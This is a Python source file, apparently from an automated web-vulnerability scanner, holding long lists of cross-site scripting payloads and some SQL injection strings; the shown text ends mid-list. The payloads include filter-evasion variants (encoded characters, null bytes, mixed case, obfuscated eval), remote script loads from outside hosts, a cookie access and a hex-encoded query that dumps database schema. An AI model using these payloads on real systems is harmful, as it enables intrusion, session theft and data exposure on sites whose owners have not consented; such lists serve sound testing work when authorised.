# coding:utf-8
from string import whitespace
import urllib
import urlparse
import mechanize
import httplib
# payload_1: 25 markup strings used as cross-site-scripting test inputs.
# Every entry opens with `">` (the first two with `</script>">`), i.e. it
# closes a double-quoted attribute value and the enclosing tag before adding
# its own element. Each one calls prompt/confirm/alert, so a reflected copy
# that a browser executes is visible as a dialog. A response that HTML-encodes
# `<`, `>` and `"` on output reflects none of these in executable form.
# Order is preserved from the original single-line literal.
payload_1 = [
    # Plain element / event-handler / javascript: URL forms.
    '</script>"><script>prompt(1)</script>',
    '</ScRiPt>"><ScRiPt>prompt(1)</ScRiPt>',
    '"><img src=x onerror=prompt(1)>',
    '"><svg/onload=prompt(1)>',
    '"><iframe/src=javascript:prompt(1)>',
    '"><h1 onclick=prompt(1)>Clickme</h1>',
    '"><a href=javascript:prompt(1)>Clickme</a>',
    '"><a href="javascript:confirm%28 1%29">Clickme</a>',
    '"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>',
    '"><textarea autofocus onfocus=prompt(1)>',
    # Many entries below write "confirm" as co\u006efir\u006d. The doubled
    # backslash puts a literal backslash + u006e in the Python string, so the
    # escape is left for the JavaScript parser to resolve. A filter that
    # matches the plain word "confirm" does not match these.
    '"><a/href=javascript:co\\u006efir\\u006d("1")>clickme</a>',
    '"><script>co\\u006efir\\u006d`1`</script>',
    '"><ScRiPt>co\\u006efir\\u006d`1`</ScRiPt>',
    '"><img src=x onerror=co\\u006efir\\u006d`1`>',
    '"><svg/onload=co\\u006efir\\u006d`1`>',
    '"><iframe/src=javascript:co\\u006efir\\u006d%28 1%29>',
    '"><h1 onclick=co\\u006efir\\u006d(1)>Clickme</h1>',
    '"><a href=javascript:prompt%28 1%29>Clickme</a>',
    '"><a href="javascript:co\\u006efir\\u006d%28 1%29">Clickme</a>',
    '"><textarea autofocus onfocus=co\\u006efir\\u006d(1)>',
    '"><details/ontoggle=co\\u006efir\\u006d`1`>clickmeonchrome',
    # %0A is a URL-encoded line feed, used here where a space would
    # normally separate attributes.
    '"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme',
    '"><img/src=x%0Aonerror=prompt`1`>',
    '"><iframe srcdoc="<img src=x:x onerror=alert(1)>">',
    '"><h1/ondrag=co\\u006efir\\u006d`1`)>DragMe</h1>',
]
payload_2 = ['<script>alert(1)</script>', '<scRipt>alErt(1)</scrIpt>', '<img src=x onerror=alert(1)>', '<script type=vbscript>MsgBox(0)</script>', "a'or 2=2--", '<IMG SRC=javascript:alert("XSS")>', '<IMG SRC=JaVaScRiPt:alert("XSS")>', '<BODY ONLOAD=alert("XSS")>', '<IMG SRC=javascript:alert('XSS')>', '<IMG SRC=" javascript:alert("XSS");">', '<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>', '<BODY BACKGROUND="javascript:alert("XSS")">', '<IMG DYNSRC="javascript:alert("XSS")">', '<INPUT TYPE="image" DYNSRC="javascript:alert("XSS");">', '<BGSOUND SRC="javascript:alert("XSS");">', '<br size="&{alert("XSS")}">', '<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>', '<LINK REL="stylesheet" HREF="javascript:alert("XSS");">', '<IMG SRC="vbscript:msgbox("XSS")">', '<IMG SRC="mocha:[code]">', '<IMG SRC="livescript:[code]">', '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert("XSS");">', '<IFRAME SRC=javascript:alert("XSS")></IFRAME>', '<FRAMESET><FRAME SRC=javascript:alert("XSS")></FRAME></FRAMESET>', '<TABLE BACKGROUND="javascript:alert("XSS")">', '<DIV STYLE="background-image: url(javascript:alert("XSS"))">', '<DIV STYLE="behaviour: url("http://xss.ha.ckers.org/exploit.htc");">', '<DIV STYLE="width: expression(alert("XSS"));">', '<STYLE>@im\\port"\\ja\\vasc\\ript:alert("XSS")";</STYLE>', '<IMG STYLE="xss: expre\\ssion(alert("XSS"))">', '<STYLE TYPE="text/javascript">alert("XSS");</STYLE>', '<XML SRC="javascript:alert("XSS");">', '"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert("XSS");}</SCRIPT><"', '<SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>', '<IMG SRC="javascript:alert("XSS")"', '<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>', '<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>', '<SCRIPT a=">" "" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT "a=">"" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>', '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>', '<A 
HREF=http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D>link</A>', '<A HREF=ht://www.google.com/>link</A>', '<A HREF=http://google.com/>link</A>', '<A HREF=http://www.google.com./>link</A>', '<A HREF="javascript:document.location="http://www.google.com/"">link</A>', '<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>', '<BASE HREF="javascript:alert("XSS");//">', '<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>', '<IMG """><SCRIPT>alert("XSS")</SCRIPT>">', '<IMG SRC=# onmouseover="alert("xxs")">', '<IMG SRC= onmouseover="alert("xxs")">', '<IMG onmouseover="alert("xxs")">', '<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>', '<img src=x onerror="javascript:alert('XSS')">', '<IMG SRC=javascript:alert('XSS')>', '<IMG SRC=javascript:alert('XSS')>', '<IMG SRC=javascript:alert('XSS')>', '<IMG SRC="javascript:alert("XSS");">', '<IMG SRC="jav	ascript:alert("XSS");">', '<IMG SRC="jav
ascript:alert("XSS");">', '<IMG SRC="jav
ascript:alert("XSS");">', '<IMG SRC="  javascript:alert("XSS");">', '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("XSS")>', '<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '<<SCRIPT>alert("XSS");//<</SCRIPT>', '<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >', '<SCRIPT SRC=//ha.ckers.org/.j>', '<IMG SRC="javascript:alert("XSS")"', '<iframe src=http://ha.ckers.org/scriptlet.html <', '\\";alert("XSS");//', '</script><script>alert("XSS");</script>', '</TITLE><SCRIPT>alert("XSS");</SCRIPT>', "<a/onmouseover[\\x0b]=location='\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x30\\x29\\x3B'>", '<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>', '<marquee/onstart=confirm(2)>', '<table background="javascript:alert(1)"></table>', '"/><marquee onfinish=confirm(123)>a</marquee>', '<svg/onload=prompt(1);>', '<isindex action="javas&tab;cript:alert(1)" type=image>', '<marquee/onstart=confirm(2)>', '/*!00000concat*/(0x63726561746f723a2064705f6d6d78,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c7565
2073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))', '<object%00something allowScriptAccess=always data=//0me.me/demo/xss/flash/normalEmbededXSS.swf?', '0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user', '1 AND (select DCount(last(username)&after=1&after=1) from users where username=ad1min)', "1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')", '%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E', '<details ontoggle=alert(1)>', '<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">', '<body style="height:1000px" onwheel="[DATA]">', '<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">', '<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">', '<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">', '<body style="height:1000px" onwheel="alert(1)">', '<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">', '<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>', '<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>', '?<input type="search" onsearch="aler\\u0074(1)">', '<details ontoggle=alert(1)>']
payload_3 = ['</ScrIpt><script>alert(1)</script>', '<scr<script>ipt>alert("XSS")</scr<script>ipt>', '<div onclick="alert(\'xss\')">', '<div style="color: expression(alert(\'XSS\'))">', '<div style="color: \'<\'; color: expression(alert(\'XSS\'))">', '%c1;alert(/xss/);//', '"onclick=alert(1)//', '"><!-- --><script>alert(xss);<script>', '<script>alert(navigator.userAgent)<script>', '<script>alert(88199)</script>', '<script>confirm(88199)</script>', '<script>prompt(88199)</script>', '<script>\\u0061\\u006C\\u0065\\u0072\\u0074(88199)</script>', '<script>+alert(88199)</script>', '<script>alert(/88199/)</script>', '<script src=data:text/javascript,alert(88199)></script>', '<script src=data:text/javascript,alert(88199)></script>', '<script>alert(String.fromCharCode(49,49))</script>', '<script>alert(/88199/.source)</script>', '<script>setTimeout(alert(88199),0)</script>', "<script>document['write'](88199);</script>", '<anytag onmouseover=alert(15)>', '<anytag onclick=alert(16)>', '<a onmouseover=alert(17)>', '<a onclick=alert(18)>', '<a href=javascript:alert(19)>', '<button/onclick=alert(20)>', '<form><button', 'formaction=javascript:alert(21)>', '<form/action=javascript:alert(22)><input/type=submit>', '<form onsubmit=alert(23)><button>', '<form onsubmit=alert(23)><button>', '<img src=x onerror=alert(24)> 29', '<body/onload=alert(25)><body>', 'onscroll=alert(26)><br><br><br><br><br><br><br>', '<br><br><br><br><br><br><br><br><br><br><br>', '<br><br><br><br><br><br><br><br><br><br><br>', '<br><br><br><br><br><br><br><br><br><br><br>', '<input autofocus>', '<iframe src="http://0x.lv/xss.swf"></iframe>', '<iframe/onload=alert(document.domain)></iframe>', '<IFRAME SRC="javascript:alert(29);"></IFRAME>', '<meta http-equiv="refresh" content="0;', 'url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2%73%63%72%69%70%74%3E">', '<object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object>', '<object 
data="javascript:alert(document.domain)">', '<marquee onstart=alert(30)></marquee>', '<isindex type=image src=1 onerror=alert(31)>', '<isindex action=javascript:alert(32) type=image>', '<input onfocus=alert(33) autofocus>', '<input onblur=alert(34) autofocus><input autofocus>', '<script>alert(1);</script>', '<script>prompt(1);</script>', '<script>confirm (1);</script>', '<a href=\xe2\x80\x9chttp://www.google.com">Clickme</a>', '<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>', '<a href=\xe2\x80\x9djavascript:alert(1)\xe2\x80\x9d>Clickme</a>', '<body/onhashchange=alert(1)><a href=#>clickit', '<img src=x onerror=prompt(1);>', '<img/src=aaa.jpg onerror=prompt(1);', '<video src=x onerror=prompt(1);>', '<audio src=x onerror=prompt(1);>', '<iframesrc="javascript:alert(2)">', '<iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">', '<embed/src=//goo.gl/nlX0P>', '<form action="Javascript:alert(1)"><input type=submit>', '<isindex action="javascript:alert(1)" type=image>', '<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>', '<isindex action=data:text/html, type=image', '<span class="pln"> </span><span class="tag"><formaction</span><span class="pun">=</span><span class="atv">&#039;data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt&#039;</span><span class="tag">><button></span><span class="pln">CLICK</span>', '<isindexformaction="javascript:alert(1)" type=image>', '<input type="image" formaction=JaVaScript:alert(0)>', '<form><button formaction=javascript:alert(1)>CLICKME', '<table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6', '<video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5', '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">', '<object/data=//goo.gl/nlX0P?', '<applet code="javascript:confirm(document.cookie);"> // Firefox Only', '<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>', '<svg/onload=prompt(1);>', '<marquee/onstart=confirm(2)>/', '<body onload=prompt(1);>', '<select autofocus onfocus=alert(1)>', '<textarea autofocus onfocus=alert(1)>', '<keygen autofocus onfocus=alert(1)>', '<video><source onerror="javascript:alert(1)">', '<q/oncut=open()>', '<q/oncut=alert(1)>', '<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>', '<body language=vbsonload=alert-1 // Works with IE8', '<command onmouseover="\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x63\\x6F\\x6E\\x66\\x6 9\\x72\\x6D\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B">Save</command>', '<a onmouseover="javascript:window.onerror=alert;throw 1>', '<img src=x onerror="javascript:window.onerror=alert;throw 1">', '<body/onload=javascript:window.onerror=eval;throw'=alert\\x281\\x29';', '<img 
style="xss:expression(alert(0))"> // Works upto IE7.', '<div style="color:rgb(''x:expression(alert(1))"></div>', '<style>#test{x:expression(alert(/XSS/))}</style>', '<a onmouseover=location=\xe2\x80\x99javascript:alert(1)>click', '<body onfocus="location='javascrpt:alert(1) >123', '<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">', '<meta http-equiv="refresh" content="0;javascript:alert(1)"/>', '<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\\u0061lert(1);"></g></svg>', '<svg xmlns:xlink=" r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>', '<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"</svg> ', '<meta content="
 1 
;JAVASCRIPT: alert(1)" http-equiv="refresh"/>', '<math><a xlink:href="//jsfiddle.net/t846h/">click', '<svg><script>alert(/1/)</script>', '<svg><script>alert( 1) ', '</script><script>alert(1)</script>', '<a href="j&#x26#x41;vascript:alert%252831337%2529">Hello</a>', '<input value="XSStest" type=text>', '"><imgsrc=x onerror=prompt(0);>', '" autofocusonfocus=alert(1)', '" onmouseover="prompt(0) x="', '" onfocusin=alert(1) autofocus x="', '" onfocusout=alert(1) autofocus x="', '" onblur=alert(1) autofocus a="', '";alert(1) ', '";document.body.addEventListener("DOMActivate",alert(1))', '";document.body.addEventListener("DOMActivate",prompt(1))', '";document.body.addEventListener("DOMActivate",confirm(1))', '<a href=\xe2\x80\x9dUserinput\xe2\x80\x9d>Click</a>', '<a href=\xe2\x80\x9djavascript:alert(1)//\xe2\x80\x9d>Click</a>', 'javascript:alert(1)', 'javaSCRIPT:alert(1)', 'JaVaScRipT:alert(1)', 'javas	cript:\\u0061lert(1);', 'javascript:\\u0061lert(1)', 'avascript:alert(document.cookie)', 'vbscript:alert(1);', 'vbscript:alert(1);', 'vbscr	ipt:alert(1)"', 'encodeURIComponent('userinput')', '-alert(1)-', '-prompt(1)-', '-confirm(1)-', 'encodeURIComponent(''-alert(1)-'')', 'encodeURIComponent(''-prompt(1)-'')', '<svg><script>varmyvar=\xe2\x80\x9dYourInput\xe2\x80\x9d;</script></svg>', 'www.site.com/test.php?var=text\xe2\x80\x9d;alert(1)//', '<svg><script>varmyvar="text";alert(1)//";</script></svg>', 'src=x onerror=prompt(0);', '???script?alert(1)?/script?', '<scri%00pt>alert(1);</scri%00pt>', '<scri\\x00pt>alert(1);</scri%00pt>', '<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>', '<script>alert(1);</script>', '<%0ascript>alert(1);</script>', '<%0bscript>alert(1);</script>', '<// style=x:expression\\28write(1)\\29>', '<!--[if]><script>alert(1)</script -->', '<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>', '<%div%20style=xss:expression(prompt(1))>', 
'<a/onmouseover[\\x0b]=location='\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x30\\x29\\x3B'>rhainfosec', '<iframesrc='http://www.target.com?foo="xss autofocus/AAAAA onfocus=location=window.name//'', 'name="javascript:alert("XSS")"></iframe>', '<script> vari=location.hash; document.write(i); </script>', '<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:()', '<scri%00pt>confirm(0);</scri%00pt>', '<a/onmouseover[\\x0b]=location='\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x30\\x29\\x3B'>rhainfosec', '<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>', '<marquee/onstart=confirm(2)>', '<table background="javascript:alert(1)"></table> ', '"/><marquee onfinish=confirm(123)>a</marquee>', '<svg/onload=prompt(1);> ', '<isindex action="javas&tab;cript:alert(1)" type=image>', '<marquee/onstart=confirm(2)>', '', '', '', '']
payload_4 = ['?><script>alert(?X?)</script>', '?><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', "' '><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '" onerror=alert(1) "', '" onerror=alert(1) x="', '-alert(1)-', '-prompt(1)-', '<marquee/onstart=confirm(1)>', '"><marquee/onstart=confirm(1)>', "'><marquee/onstart=confirm(1)>", '<img src=x onerror=prompt(1);>', '"><img src=x onerror=prompt(1);>', "'><img src=x onerror=prompt(1);>", '<img src=x onerror=prompt(1)>', '"><img src=x onerror=prompt(1)>', "'><img src=x onerror=prompt(1)>", '\'\';!--"<X>=&{()}', '<SCRIPT>+alert("X");</SCRIPT>', '</ScrIpt><SCRIPT>+alert("X");</SCRIPT>', '"><SCRIPT>+alert("X");</SCRIPT>', '</ScrIpt><SCRIPT>+alert("X");</SCRIPT>', '\'><SCRIPT>+alert("X");</SCRIPT>', '</ScrIpt><SCRIPT>+alert("X");</SCRIPT>', '<SCRIPT>+alert("X")</SCRIPT>', '</ScrIpt><SCRIPT>+alert("X")</SCRIPT>', '"><SCRIPT>+alert("X")</SCRIPT>', '</ScrIpt><SCRIPT>+alert("X")</SCRIPT>', '\'><SCRIPT>+alert("X")</SCRIPT>', '</ScrIpt><SCRIPT>+alert("X")</SCRIPT>', '<script>alert(/X/)</script>', '</ScrIpt><script>alert(/X/)</script>', '"><script>alert(/X/)</script>', '</ScrIpt><script>alert(/X/)</script>', "'><script>alert(/X/)</script>", '</ScrIpt><script>alert(/X/)</script>', '<svg><script>varmyvar="text";alert(1)//";</script></svg>', '"><svg><script>varmyvar="text";alert(1)//";</script></svg>', '\'><svg><script>varmyvar="text";alert(1)//";</script></svg>', '<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>', '"><object 
type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>', '\'><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>', '<math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">click', '"><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">click', '\'><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">click', '<embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>', '"><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>', '\'><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>', '<script itworksinallbrowsers>/*<script* */alert(1)</script', '"><script itworksinallbrowsers>/*<script* */alert(1)</script', "'><script itworksinallbrowsers>/*<script* */alert(1)</script", '<img src ?itworksonchrome?\\/onerror = alert(1)', '"><img src ?itworksonchrome?\\/onerror = alert(1)', "'><img src ?itworksonchrome?\\/onerror = alert(1)", '<script crossorigin>alert(1);</script>', '"><script crossorigin>alert(1);</script>', "'><script crossorigin>alert(1);</script>", '<script async>alert(1);</script async>', '"><script async>alert(1);</script async>', "'><script async>alert(1);</script async>", '<script charset>alert(1);</script charset>', '"><script charset>alert(1);</script charset>', "'><script charset>alert(1);</script charset>", '<script a b c >alert(1)</script d e f>', '"><script a b c >alert(1)</script d e f>', "'><script a b c >alert(1)</script d e f>", '<img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(1)>', '"><img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(1)>', '\'><img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(1)>', '"><img src=x onerror=prompt(1)>', "'><img src=x onerror=prompt(1)>", '<img src=x onerror=document.body.innerHTML=location.hash>#"><img/src=\'x\'onerror=prompt(1)>', '"><img 
src=x onerror=document.body.innerHTML=location.hash>#"><img/src=\'x\'onerror=prompt(1)>', '\'><img src=x onerror=document.body.innerHTML=location.hash>#"><img/src=\'x\'onerror=prompt(1)>', '<img src=x onerror=document.body.innerHTML=location.hash>#<img src=x onerror=prompt(1)>', '"><img src=x onerror=document.body.innerHTML=location.hash>#<img src=x onerror=prompt(1)>', "'><img src=x onerror=document.body.innerHTML=location.hash>#<img src=x onerror=prompt(1)>", '"><img src=x onerror=prompt(1)>', "'><img src=x onerror=prompt(1)>", "<img src=x onerror=document.body.innerHTML=location.hash>#<img/src='x'onerror=prompt(1)>", '"><img src=x onerror=document.body.innerHTML=location.hash>#<img/src=\'x\'onerror=prompt(1)>', "'><img src=x onerror=document.body.innerHTML=location.hash>#<img/src='x'onerror=prompt(1)>", '<svg onload=document.body.innerHTML=location.hash>#<img src=x onerror=alert(1)>', '"><svg onload=document.body.innerHTML=location.hash>#<img src=x onerror=alert(1)>', "'><svg onload=document.body.innerHTML=location.hash>#<img src=x onerror=alert(1)>", "<svg onload=document.body.innerHTML=location.hash>#<img src='x'onerror=alert(1)>", '"><svg onload=document.body.innerHTML=location.hash>#<img src=\'x\'onerror=alert(1)>', "'><svg onload=document.body.innerHTML=location.hash>#<img src='x'onerror=alert(1)>", '<svg onload=document.body.innerHTML=location.hash>#<svg onload=prompt(1)>', '"><svg onload=document.body.innerHTML=location.hash>#<svg onload=prompt(1)>', "'><svg onload=document.body.innerHTML=location.hash>#<svg onload=prompt(1)>", '<svg onload=document.body.innerHTML=location.hash>#<svg/onload=prompt(1)>', '"><svg onload=document.body.innerHTML=location.hash>#<svg/onload=prompt(1)>', "'><svg onload=document.body.innerHTML=location.hash>#<svg/onload=prompt(1)>", '--!><svg onload=prompt(1)', 'eval(((_=!1)+{})[1]+(_+{})[2]+(_+{})[4]+((_=!!1)+{})[1]+(_+{})[0]+((_=>(_))+1)[3]+1+((_=>(_))+1)[5])', 'eval((_=!0+(()=>0)+!1)[10]+_[11]+_[3]+_[1]+_[0]+_[4]+1+_[5])', 
'<marquee>alert( `X :)`)</marquee>', '"><marquee>alert( `X :)`)</marquee>', "'><marquee>alert( `X :)`)</marquee>", '<"script">"alert(0)"</"script">', '"><"script">"alert(0)"</"script">', '\'><"script">"alert(0)"</"script">', "<s[NULL]cript>alert(1)</s[NULL]cript>'>X</a>", '"><s[NULL]cript>alert(1)</s[NULL]cript>\'>X</a>', "'><s[NULL]cript>alert(1)</s[NULL]cript>'>X</a>", '<video><source o?UTF-8?Q?n?error="alert(1)">', '"><video><source o?UTF-8?Q?n?error="alert(1)">', '\'><video><source o?UTF-8?Q?n?error="alert(1)">', '<body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', '"><body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', "'><body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", '<meta charset="x-mac-farsi">??script ??alert(1)//??/script ??', '"><meta charset="x-mac-farsi">??script ??alert(1)//??/script ??', '\'><meta charset="x-mac-farsi">??script ??alert(1)//??/script ??', "<x onload'=alert(1)", '"><x onload\'=alert(1)', "'><x onload'=alert(1)", "<sc'+'ript>alert(1)</script>", '"><sc\'+\'ript>alert(1)</script>', "'><sc'+'ript>alert(1)</script>", '<FRAMESET><FRAME RC=""+"javascript:alert(\'X\');"></FRAMESET>', '"><FRAMESET><FRAME RC=""+"javascript:alert(\'X\');"></FRAMESET>', '\'><FRAMESET><FRAME RC=""+"javascript:alert(\'X\');"></FRAMESET>', '</script>"//\'//<svg%0Aonload=alert(1)//>', '"></script>"//\'//<svg%0Aonload=alert(1)//>', '\'></script>"//\'//<svg%0Aonload=alert(1)//>', '\'//</script><svg%20"%0aonload=alert(1)%20//>', '</script>\'//<svg "%0Aonload=alert(1) //>', '"></script>\'//<svg "%0Aonload=alert(1) //>', '\'></script>\'//<svg "%0Aonload=alert(1) //>', '\'//</script><svg "%0Aonload=alert(1)// />', '</script>"//\'//<svg%0Aonload=alert(1) //>', '"></script>"//\'//<svg%0Aonload=alert(1) //>', '\'></script>"//\'//<svg%0Aonload=alert(1) //>', '</script>\'//<svg "%0Aonload=alert(1)// />', '"></script>\'//<svg "%0Aonload=alert(1)// />', '\'></script>\'//<svg 
"%0Aonload=alert(1)// />', '</script "//\'//><svg%0Aonload=alert(1)//>', '"></script "//\'//><svg%0Aonload=alert(1)//>', '\'></script "//\'//><svg%0Aonload=alert(1)//>', '\';//</script><svg ";%0Aonload=alert(1)// />#', '</script><img src \'//"%0Aonerror=alert(1)//', '"></script><img src \'//"%0Aonerror=alert(1)//', '\'></script><img src \'//"%0Aonerror=alert(1)//', '</script><svg onload=\'-/"/-[alert(1)]//\'/>', '"></script><svg onload=\'-/"/-[alert(1)]//\'/>', '\'></script><svg onload=\'-/"/-[alert(1)]//\'/>', '</script><img \'//"%0Aonerror=alert(1)// src>', '"></script><img \'//"%0Aonerror=alert(1)// src>', '\'></script><img \'//"%0Aonerror=alert(1)// src>', '</script><img \'//"%0Aonerror=alert(1)// src=1>', '"></script><img \'//"%0Aonerror=alert(1)// src=1>', '\'></script><img \'//"%0Aonerror=alert(1)// src=1>', '</script "/*\'/*><svg */; onload=alert(1) //>', '"></script "/*\'/*><svg */; onload=alert(1) //>', '\'></script "/*\'/*><svg */; onload=alert(1) //>', '</script><script>/*"/*\'/**/;alert(1)//</script>#', '"></script><script>/*"/*\'/**/;alert(1)//</script>#', '\'></script><script>/*"/*\'/**/;alert(1)//</script>#', '</script "/*\'/*><img/src=x */; onerror=alert(1) //', '"></script "/*\'/*><img/src=x */; onerror=alert(1) //', '\'></script "/*\'/*><img/src=x */; onerror=alert(1) //', '</script><script>/*var a="/*""\'/**/;alert(1);//</script>', '"></script><script>/*var a="/*""\'/**/;alert(1);//</script>', '\'></script><script>/*var a="/*""\'/**/;alert(1);//</script>', '<iframe src="data:data:javascript:,% 3 c script % 3 e confirm(1) % 3 c/script %3 e">', '"><iframe src="data:data:javascript:,% 3 c script % 3 e confirm(1) % 3 c/script %3 e">', '\'><iframe src="data:data:javascript:,% 3 c script % 3 e confirm(1) % 3 c/script %3 e">', "' style='width:expression(prompt(1));", '"width:expression(prompt(1))', 'width:\\0065\\0078\\0070\\0072\\0065\\0073\\0073\\0069\\006F\\006E\\0028\\0070\\0072\\006F\\006D\\0070\\0074\\0028\\0031\\0029\\0029', 
